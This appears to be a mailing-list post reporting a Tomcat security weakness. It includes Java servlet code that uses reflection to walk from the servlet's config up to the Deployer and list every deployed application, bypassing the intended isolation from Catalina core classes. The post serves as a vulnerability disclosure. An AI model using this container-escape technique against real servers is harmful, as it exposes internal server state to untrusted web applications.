I apologize for repeating this, but I did not yet get any answer.
I wrote a servlet in a classic WAR file at an arbitrary location and NOT in the
org.apache.catalina package. From this servlet, I was able to access a method on the
Deployer, i.e. I was able to access anything public in any Container "from outside".
This is only working by using reflection.
Here is the code (not clean, sorry about that) for the doGet method:
response.setContentType("text/plain");
PrintWriter writer = response.getWriter();
Object theWrapper = (Object) this.getServletConfig();
try {
Method method = theWrapper.getClass().getMethod("getParent", new Class[]
{});
Object theContext = method.invoke(theWrapper, new Object[] {});
method = theContext.getClass().getMethod("getParent", new Class[] {});
Object theDeployer = method.invoke(theContext, new Object[] {});
method = theDeployer.getClass().getMethod("findDeployedApps", new Class[]
{});
Object deployedApps = method.invoke(theDeployer, new Object[] {});
String[] apps = (String[]) deployedApps;
writer.println("detected apps:");
for (int i=0; i<apps.length;i++) {
writer.println(apps[i]);
}
} catch (Exception e) {
e.printStackTrace();
writer.println("An exception occured when invoking the method,
"+e.getMessage());
}
writer.flush();
writer.close();
Conclusion: there is a security issue. We don't need the prerequisite to access
Catalina core classes. I am really wondering how it would be possible to fix this
security problem without an important redesign.
Regards,
Fabien
P.S.: should I include a WAR file?
